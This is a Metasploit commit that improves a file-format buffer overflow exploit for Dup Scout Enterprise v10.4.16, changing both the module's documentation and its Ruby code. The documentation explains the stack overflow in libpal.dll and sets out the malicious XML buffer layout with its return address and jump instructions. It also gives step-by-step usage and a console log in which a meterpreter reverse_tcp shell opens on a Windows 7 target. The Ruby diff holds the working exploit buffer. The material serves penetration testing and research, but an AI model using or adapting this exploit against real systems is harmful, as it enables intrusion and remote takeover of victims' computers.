Land rapid7#9478, Improve Dup Scout BOF exploit

busterb · busterb · commit ca4ad1d0c4e9 · 2018-02-07T23:51:14.000-06:00
diff --git a/documentation/modules/exploit/windows/fileformat/dupscout_xml.md b/documentation/modules/exploit/windows/fileformat/dupscout_xml.md
@@ -1,45 +1,80 @@
-This module exploits a buffer overflow in Dup Scout Enterprise v10.4.16 by using the import command option to import a specially crafted xml file.
+## Description
+
+This module exploits a buffer overflow in `libpal.dll` that is used by [Dup Scout Enterprise v10.4.16](http://www.dupscout.com/setups/dupscoutent_setup_v10.4.16.exe). The buffer overflow occurs during a call to the `SCA_XmlParser::GetToken` function when a user-supplied Command file with a crafted name attribute is imported to the Dup Scout application. The `SCA_XmlParser::GetToken` function is passed a heap pointer as an argument, which was created by the `SCA_XmlParser::LoadXmlFile` function and contains data from the user-supplied Command file, and a pointer to a stack buffer that was created in the `SCA_XmlParser::ParseXmlElement` function. While parsing the name attribute, the `SCA_XmlParser::GetToken` function copies from the heap buffer to the stack buffer until a single quote (to match `name='`, or a double quote to match `name="`) is found or until it finishes reading from the allocated heap buffer.
 
 ## Vulnerable Application
 
-This module has been tested successfully on Windows 7 SP1. The vulnerable application is available for download at [www.dupscout.com](http://www.dupscout.com/setups/dupscoutent_setup_v10.4.16.exe).
+The vulnerability can be exploited when the size of the name attribute is greater than 1560 bytes.
+
+Note: The allocated stack buffer size is 1564 bytes but the first four bytes are filled with `\xff` during execution of the `SCA_XmlParser::GetToken` function.
+
+Since the stack buffer was allocated as a local variable for the `SCA_XmlParser::ParseXmlElement` function, the program's control flow isn't taken over until the return of the `SCA_XmlParser::ParseXmlElement` function even though the return value is overwritten during execution of the `SCA_XmlParser::GetToken` function.
+
+The format of the crafted Command file will be:
+
+```
+buf = "<?xml ?><a name='"
+buf << make_nops(1560)   # Fill up the stack buffer
+buf << addr_of_jmp_esp   # overwrite the return address for SCA_XmlParser::ParseXmlElement
+buf << make_nops(16)     # account for ret 10h in SCA_XmlParser::ParseXmlElement
+buf << inst1             # LEA EAX, [ESP+14h] # Prepare EAX to jump to payload
+buf << inst2             # JMP EAX # Jump to our desired location
+buf << make_nops(14)     # Fill past possibly corrupted location
+buf << payload           # Location that is jumped to
+```
+
+Note: The last make_nops will offset the location of the payload. The offset is included to account for writes to the stack buffer that after the user-supplied Command file has been processed.
 
 ## Verification Steps
 
-1. Start msfconsole
-2. Do: `exploit/windows/fileformat/dupscout_xml`
-3. Do: `set PAYLOAD [PAYLOAD]`
-4. Do: `run`
+- [ ] Install Dup Scout Enterprise on target system
+- [ ] `./msfconsole`
+- [ ] `use exploit/windows/fileformat/dupscout_xml`
+- [ ] `set payload windows/meterpreter/reverse_tcp`
+- [ ] `set lhost <lhost>`
+- [ ] `run`
+- [ ] `use exploit/multi/handler`
+- [ ] `set payload windows/meterpreter/reverse_tcp`
+- [ ] `set lhost <lhost>`
+- [ ] `run`
+- [ ] From the DupScout Enterprise menu select Command -> Import Command
+- [ ] Select file generated by metasploit
+- [ ] Get a session
+
+
+## Scenarios
+
+### Dup Scout Enterprise v10.4.16 Windows 7 SP1 x64.
 
-## Example
 ```
-msf > use exploit/windows/fileformat/dupscout_xml 
-msf exploit(windows/fileformat/dupscout_xml) > set PAYLOAD windows/meterpreter/reverse_tcp
-PAYLOAD => windows/meterpreter/reverse_tcp
-msf exploit(windows/fileformat/dupscout_xml) > set LHOST 172.16.40.146 
-LHOST => 172.16.40.146
-msf exploit(windows/fileformat/dupscout_xml) > run
+msf5 > use exploit/windows/fileformat/dupscout_xml
+msf5 exploit(windows/fileformat/dupscout_xml) > set payload windows/meterpreter/reverse_tcp
+payload => windows/meterpreter/reverse_tcp
+msf5 exploit(windows/fileformat/dupscout_xml) > set lhost 172.22.222.120
+lhost => 172.22.222.120
+msf5 exploit(windows/fileformat/dupscout_xml) > run
 
 [*] Creating 'msf.xml' file ...
-[+] msf.xml stored at /root/.msf4/local/msf.xml
-msf exploit(windows/fileformat/dupscout_xml) > use exploit/multi/handler 
-msf exploit(multi/handler) > set PAYLOAD windows/meterpreter/reverse_tcp
-PAYLOAD => windows/meterpreter/reverse_tcp
-msf exploit(multi/handler) > set LHOST 172.16.40.146 
-LHOST => 172.16.40.146
-msf exploit(multi/handler) > run
-
-[*] Started reverse TCP handler on 172.16.40.146:4444 
-[*] Sending stage (179779 bytes) to 172.16.40.144
-[*] Meterpreter session 1 opened (172.16.40.146:4444 -> 172.16.40.144:49790) at 2018-01-24 20:56:56 +0000
-
-meterpreter > sysinfo 
-Computer        : PC
+[+] msf.xml stored at /home/msfdev/.msf4/local/msf.xml
+msf5 exploit(windows/fileformat/dupscout_xml) > use exploit/multi/handler
+msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
+payload => windows/meterpreter/reverse_tcp
+msf5 exploit(multi/handler) > set lhost 172.22.222.120
+lhost => 172.22.222.120
+msf5 exploit(multi/handler) > run
+
+[*] Started reverse TCP handler on 172.22.222.120:4444 
+[*] Sending stage (179779 bytes) to 172.22.222.122
+
+meterpreter > getuid
+Server username: .\pwnduser
+meterpreter > sysinfo
+Computer        : .
 OS              : Windows 7 (Build 7601, Service Pack 1).
-Architecture    : x86
-System Language : pt_PT
+Architecture    : x64
+System Language : en_US
 Domain          : WORKGROUP
-Logged On Users : 1
+Logged On Users : 2
 Meterpreter     : x86/windows
 meterpreter > 
 ```
diff --git a/modules/exploits/windows/fileformat/dupscout_xml.rb b/modules/exploits/windows/fileformat/dupscout_xml.rb
@@ -33,12 +33,12 @@ def initialize(info = {})
       'Platform'        => 'win',
       'Payload'         =>
         {
-          'BadChars' => "\x00\x01\x02\x0a\x0b\x0c\x22\x27",
+          'BadChars' => "\x27",
           'StackAdjustment' => -3500
         },
       'Targets'         =>
         [
-          ['Windows Universal', { 'Ret' => 0x651BB77A  } ]
+          ['Windows Universal', { 'Ret' => 0x651BB77A  } ] # JMP ESP [QtGui4.dll]
         ],
       'Privileged'      => false,
       'DisclosureDate'  => 'Mar 29 2017',
@@ -51,21 +51,19 @@ def initialize(info = {})
   end
 
   def exploit
-    esp = "\x8D\x44\x24\x4C" # LEA EAX, [ESP+76]
-    jmp = "\xFF\xE0" # JMP ESP
+    esp = "\x8d\x44\x24\x14" #LEA EAX, [ESP+14h]
+    jmp = "\xff\xe0" # JMP EAX
 
-    buffer =  "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<classify\nname=\'"
-    buffer << "\x90" * 1560
-    buffer << [target.ret].pack('V')
-    buffer << "\x90" * 16
-    buffer << esp
-    buffer << jmp
-    buffer << "\x90" * 70
-    buffer << payload.encoded
-    buffer << "\x90" * 5000
-    buffer << "\n</classify>"
+    buf = "<?xml ?><a name='"
+    buf << make_nops(1560)
+    buf << [target.ret].pack('V')
+    buf << make_nops(16)
+    buf << esp
+    buf << jmp
+    buf << make_nops(14)
+    buf << payload.encoded
 
     print_status("Creating '#{datastore['FILENAME']}' file ...")
-    file_create(buffer)
+    file_create(buf)
   end
 end
